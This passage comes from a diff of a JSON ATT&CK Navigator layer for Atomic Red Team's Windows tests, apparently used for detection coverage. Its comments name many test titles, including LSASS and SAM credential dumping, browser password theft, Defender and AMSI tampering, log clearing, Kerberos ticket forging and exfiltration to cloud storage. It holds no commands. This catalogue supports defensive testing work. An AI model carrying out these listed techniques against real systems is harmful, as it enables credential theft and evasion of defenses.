Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}],"comment":"\n- Extract Windows Credential Manager via VBA\n- Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]\n- Dump credentials from Windows Credential Manager With PowerShell [web Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]\n- WinPwn - Loot local Credentials - lazagne\n- WinPwn - Loot local Credentials - Wifi Credentials\n- WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords\n"},{"techniqueID":"T1555.003","score":14,"enabled":true,"comment":"\n- Run Chrome-password Collector\n- LaZagne - Credentials from Browser\n- Simulating access to Chrome Login Data\n- Simulating access to Opera Login Data\n- Simulating access to Windows Firefox Login Data\n- Simulating access to Windows Edge Login Data\n- Decrypt Mozilla Passwords with Firepwd.py\n- Stage Popular Credential Files for Exfiltration\n- WinPwn - BrowserPwn\n- WinPwn - Loot local Credentials - mimi-kittenz\n- WinPwn - PowerSharpPack - Sharpweb for Browser Credentials\n- WebBrowserPassView - Credentials from Browser\n- BrowserStealer (Chrome / Firefox / Microsoft Edge)\n- Dump Chrome Login Data with esentutl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"comment":"\n- Access Saved Credentials via VaultCmd\n- WinPwn - Loot local Credentials - Invoke-WCMDump\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"comment":"\n- Install and Register Password Filter DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"comment":"\n- LLMNR Poisoning with Inveigh (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"comment":"\n- Crafting Active Directory golden tickets with mimikatz\n- Crafting Active Directory golden tickets with Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"comment":"\n- Crafting Active Directory silver tickets with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"comment":"\n- Request for service tickets\n- Rubeus kerberoast\n- Extract all accounts in use as SPN using setspn\n- Request A Single Ticket via PowerShell\n- Request All Tickets via PowerShell\n- WinPwn - Kerberoasting\n- WinPwn - PowerSharpPack - 
Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"comment":"\n- Rubeus asreproast\n- Get-DomainUser with PowerView\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}],"comment":"\n- Cobalt Strike Artifact Kit pipe\n- Cobalt Strike Lateral Movement (psexec_psh) pipe\n- Cobalt Strike SSH (postex_ssh) pipe\n- Cobalt Strike post-exploitation pipe (4.2 and later)\n- Cobalt Strike post-exploitation pipe (before 4.2)\n"},{"techniqueID":"T1559.002","score":3,"enabled":true,"comment":"\n- Execute Commands\n- Execute PowerShell script via Word DDE\n- DDEAUTO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}],"comment":"\n- Compress Data for Exfiltration With PowerShell\n"},{"techniqueID":"T1560.001","score":5,"enabled":true,"comment":"\n- Compress Data for Exfiltration With Rar\n- Compress Data and lock with password for Exfiltration with winrar\n- Compress Data and lock with password for Exfiltration with winzip\n- Compress Data and lock with password for Exfiltration with 7zip\n- ESXi - Remove Syslog remote IP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1562","score":58,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Windows Disable LSA Protection\n"},{"techniqueID":"T1562.001","score":33,"enabled":true,"comment":"\n- Unload Sysmon Filter Driver\n- Uninstall Sysmon\n- AMSI Bypass - AMSI InitFailed\n- AMSI Bypass - Remove AMSI Provider Reg Key\n- Disable Arbitrary Security Windows Service\n- Tamper with Windows Defender ATP PowerShell\n- Tamper with Windows Defender Command Prompt\n- Tamper with Windows Defender Registry\n- Disable Microsoft Office Security Features\n- Remove Windows Defender Definition Files\n- Stop and Remove Arbitrary Security Windows Service\n- Uninstall Crowdstrike Falcon on Windows\n- Tamper with Windows Defender Evade Scanning -Folder\n- Tamper with Windows Defender Evade Scanning -Extension\n- Tamper with Windows Defender Evade Scanning -Process\n- Disable Windows Defender with DISM\n- Disable Defender Using NirSoft AdvancedRun\n- Kill antimalware protected processes using Backstab\n- WinPwn - Kill the event log services for stealth\n- Tamper with Windows Defender ATP using Aliases - PowerShell\n- LockBit Black - Disable Privacy Settings Experience Using Registry -cmd\n- LockBit Black - Use Registry Editor to turn on automatic logon -cmd\n- LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell\n- Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell\n- Disable Windows Defender with PwSh Disable-WindowsOptionalFeature\n- WMIC Tamper with Windows Defender Evade Scanning Folder\n- Delete Windows Defender Scheduled Tasks\n- Disable Hypervisor-Enforced Code Integrity (HVCI)\n- AMSI Bypass - Override AMSI via COM\n- Tamper with Windows Defender Registry - Reg.exe\n- Tamper with Windows Defender Registry - Powershell\n- Delete Microsoft Defender ASR Rules - InTune\n- Delete Microsoft Defender ASR Rules - GPO\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"comment":"\n- Disable Windows IIS HTTP Logging\n- Disable Windows IIS HTTP Logging via PowerShell\n- Kill Event Log Service Threads\n- Impair Windows Audit Log Policy\n- Clear Windows Audit Policy Config\n- Disable Event Logging with wevtutil\n- Makes Eventlog blind with Phant0m\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":10,"enabled":true,"comment":"\n- Disable Microsoft Defender Firewall\n- Disable Microsoft Defender Firewall via Registry\n- Allow SMB and RDP on Microsoft Defender Firewall\n- Opening ports for proxy - HARDRAIN\n- Open a local port through Windows Firewall to any profile\n- Allow Executable Through Firewall Located in Non-Standard Location\n- LockBit Black - Unusual Windows firewall registry modification -cmd\n- LockBit Black - Unusual Windows firewall registry modification -Powershell\n- Blackbit - Disable Windows Firewall using netsh firewall\n- ESXi - Disable Firewall via Esxcli\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":5,"enabled":true,"comment":"\n- Disable Powershell ETW Provider - Windows\n- Disable .NET Event Tracing for Windows Via Registry (cmd)\n- Disable .NET Event Tracing for Windows Via Registry (powershell)\n- LockBit Black - Disable the ETW Provider of Windows Defender -cmd\n- LockBit Black - Disable the ETW Provider of Windows Defender -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"comment":"\n- Safe Mode Boot\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":1,"enabled":true,"comment":"\n- PowerShell Version 2 Downgrade\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"comment":"\n- RDP hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}],"comment":"\n- Extract binary files via VBA\n- Create a Hidden User Called \"$\"\n- Create an \"Administrator \" user (with a space on the end)\n- Create and Hide a Service with sc.exe\n- Command Execution with NirCmd\n"},{"techniqueID":"T1564.001","score":5,"enabled":true,"comment":"\n- Create Windows System File with Attrib\n- Create Windows Hidden File with Attrib\n- Hide Files Through Registry\n- Create Windows Hidden File with powershell\n- Create Windows System File with powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":1,"enabled":true,"comment":"\n- Create Hidden User in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"comment":"\n- Hidden Window\n- Headless Browser Accessing Mockbin\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"comment":"\n- Alternate Data Streams (ADS)\n- Store file in Alternate Data Stream (ADS)\n- Create ADS command prompt\n- Create ADS PowerShell\n- Create Hidden Directory via $index_allocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"comment":"\n- Register Portable Virtualbox\n- Create and start VirtualBox virtual machine\n- Create and start Hyper-V virtual machine\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"comment":"\n- Download Macro-Enabled Phishing Attachment\n- Word spawned a command shell and used an IP address in the command line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data with rclone to cloud Storage - Mega (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"comment":"\n- Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows)\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":5,"enabled":true,"comment":"\n- Execute a Command as a Service\n- Use PsExec to execute a command on a remote host\n- BlackCat pre-encryption cmds with Lateral Movement\n- Use RemCom to execute a command on a remote host\n- Snake Malware Service Create\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"comment":"\n- Exfiltration Over SMB over QUIC (New-SmbMapping)\n- Exfiltration Over SMB over QUIC (NET USE)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"comment":"\n- DNS over HTTPS Large Query Volume\n- DNS over HTTPS Regular Beaconing\n- DNS over HTTPS Long Domain Query\n- run ngrok\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"comment":"\n- OpenSSL C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"comment":"\n- DLL Search 
Order Hijacking - amsi.dll\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"comment":"\n- DLL Side-Loading using the Notepad++ GUP.exe binary\n- DLL Side-Loading using the dotnet startup hook environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"comment":"\n- powerShell Persistence via hijacking default modules - Get-Variable.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"comment":"\n- Execution of program.exe as service with unquoted service path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"comment":"\n- Service Registry Permissions Weakness\n- Service ImagePath Change with reg.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"comment":"\n- User scope COR_PROFILER\n- System Scope COR_PROFILER\n- Registry-free process scope COR_PROFILER\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"comment":"\n- Enumerate PlugNPlay Camera\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1614","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":2,"enabled":true,"comment":"\n- Discover System Language by Registry Query\n- Discover System Language with chcp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"comment":"\n- Display group policy information via gpresult\n- Get-DomainGPO to display group policy information via PowerView\n- WinPwn - GPOAudit\n- WinPwn - GPORemoteAccessPolicy\n- MSFT Get-GPO Cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"comment":"\n- WinPwn - Reflectively load Mimik@tz into memory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"comment":"\n- Staging Local Certificates via Export-Certificate\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":1,"enabled":true,"comment":"\n- Get-EventLog To Enumerate Windows Security Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file +{"name":"Atomic Red Team (Windows)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator 
Layer","domain":"enterprise-attack","filters":{"platforms":["Windows"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":40,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}],"comment":"\n- Gsecdump\n- Credential Dumping with NPPSpy\n- Dump svchost.exe to gather RDP credentials\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)\n- Dump Credential Manager using keymgr.dll and rundll32.exe\n"},{"techniqueID":"T1003.001","score":14,"enabled":true,"comment":"\n- Dump LSASS.exe Memory using ProcDump\n- Dump LSASS.exe Memory using comsvcs.dll\n- Dump LSASS.exe Memory using direct system calls and API unhooking\n- Dump LSASS.exe Memory using NanoDump\n- Dump LSASS.exe Memory using Windows Task Manager\n- Offline Credential Theft With Mimikatz\n- LSASS read with pypykatz\n- Dump LSASS.exe Memory using Out-Minidump.ps1\n- Create Mini Dump of LSASS.exe using ProcDump\n- Powershell Mimikatz\n- Dump LSASS with createdump.exe from .Net v5\n- Dump LSASS.exe using imported Microsoft DLLs\n- Dump LSASS.exe using lolbin rdrleakdiag.exe\n- Dump LSASS.exe Memory through Silent Process Exit\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"comment":"\n- Registry dump of SAM, creds, and secrets\n- Registry parse with pypykatz\n- esentutl.exe SAM copy\n- PowerDump Hashes and Usernames from Registry\n- dump volume shadow copy hives with certutil\n- dump volume shadow copy hives with System.IO.File\n- WinPwn - Loot local Credentials - Dump SAM-File for NTLM 
Hashes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":9,"enabled":true,"comment":"\n- Create Volume Shadow Copy with vssadmin\n- Copy NTDS.dit from Volume Shadow Copy\n- Dump Active Directory Database with NTDSUtil\n- Create Volume Shadow Copy with WMI\n- Create Volume Shadow Copy remotely with WMI\n- Create Volume Shadow Copy remotely (WMI) with esentutl\n- Create Volume Shadow Copy with Powershell\n- Create Symlink to Volume Shadow Copy\n- Create Volume Shadow Copy with diskshadow\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"comment":"\n- Dumping LSA Secrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"comment":"\n- Cached Credential Dump via Cmdkey\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"comment":"\n- DCSync (Active Directory)\n- Run DSInternals Get-ADReplAccount\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1005","score":1,"enabled":true,"comment":"\n- Search files of interest and save them to a single zip file (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"comment":"\n- Read volume boot sector via DOS device path (PowerShell)\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":2,"enabled":true,"comment":"\n- System Service Discovery\n- System Service Discovery - net.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"comment":"\n- List Process Main Windows - C# .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"comment":"\n- Query Registry\n- Query Registry with Powershell cmdlets\n- Enumerate COM Objects in Registry with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":7,"enabled":true,"comment":"\n- System Network Configuration Discovery on Windows\n- List Windows Firewall Rules\n- System Network Configuration Discovery (TrickBot Style)\n- List Open Egress Ports\n- Adfind - Enumerate Active Directory Subnet Objects\n- Qakbot Recon\n- DNS Server Discovery Using nslookup\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":15,"enabled":true,"comment":"\n- Remote System Discovery - net\n- Remote System Discovery - net group Domain Computers\n- Remote System Discovery - nltest\n- Remote System Discovery - ping sweep\n- Remote System Discovery - arp\n- Remote System Discovery - nslookup\n- Remote System Discovery - adidnsdump\n- Adfind - Enumerate Active Directory Computer Objects\n- Adfind - Enumerate Active Directory Domain Controller Objects\n- Enumerate domain computers within Active Directory using DirectorySearcher\n- Enumerate Active Directory Computers with Get-AdComputer\n- Enumerate Active Directory Computers with 
ADSISearcher\n- Get-DomainController with PowerView\n- Get-WmiObject to Enumerate Domain Controllers\n- Remote System Discovery - net group Domain Controller\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"comment":"\n- IcedID Botnet HTTP PUT\n- Exfiltration via Encrypted FTP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"comment":"\n- RDP to DomainController\n- Changing RDP Port to Non Standard Port via Powershell\n- Changing RDP Port to Non Standard Port via Command_Prompt\n- Disable NLA for RDP via Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"comment":"\n- Map admin share\n- Map Admin Share PowerShell\n- Copy and Execute File with PsExec\n- Execute command writing output to local Admin Share\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"comment":"\n- PowerShell Lateral Movement using MMC20\n- PowerShell Lateral Movement Using Excel Application Object\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"comment":"\n- Enable Windows Remote Management\n- Remote Code Execution with PS Credentials Using Invoke-Command\n- WinRM Access with Evil-WinRM\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Execute base64-encoded PowerShell\n- Execute base64-encoded PowerShell from Windows Registry\n- Execution from Compressed File\n- DLP Evasion via Sensitive Data in VBA Macro over email\n- DLP Evasion via Sensitive Data in VBA Macro over HTTP\n- Obfuscated Command in PowerShell\n- Obfuscated Command Line using special Unicode characters\n- Snake Malware Encrypted crmlog file\n- Execution from Compressed JScript File\n"},{"techniqueID":"T1027.004","score":2,"enabled":true,"comment":"\n- Compile After Delivery using csc.exe\n- Dynamic C# Compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"comment":"\n- HTML Smuggling Remote Payload\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"comment":"\n- Dynamic API Resolution-Ninja-syscall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1033","score":6,"enabled":true,"comment":"\n- System Owner/User Discovery\n- Find computers where user has session - Stealth mode (PowerView)\n- User Discovery With Env Vars PowerShell Script\n- GetCurrent User with PowerShell Script\n- System Discovery - SocGholish whoami\n- System Owner/User Discovery Using Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":13,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}],"comment":"\n- System File Copied to Unusual Location\n- Malware Masquerading and Execution from Zip File\n"},{"techniqueID":"T1036.003","score":8,"enabled":true,"comment":"\n- Masquerading as Windows LSASS process\n- Masquerading - cscript.exe running as notepad.exe\n- Masquerading - wscript.exe running as svchost.exe\n- Masquerading - powershell.exe running as taskhostw.exe\n- Masquerading - non-windows exe running as windows exe\n- Masquerading - windows exe running as different windows exe\n- Malicious process Masquerading as LSM.exe\n- File Extension Masquerading\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":2,"enabled":true,"comment":"\n- Creating W32Time similar named service using schtasks\n- Creating W32Time similar named service using sc\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Masquerade as a built-in system executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1037","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"comment":"\n- Logon Scripts\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"comment":"\n- Copy a sensitive File over Administrative share with copy\n- Copy a sensitive File over Administrative share with Powershell\n","links":[{"label":"View 
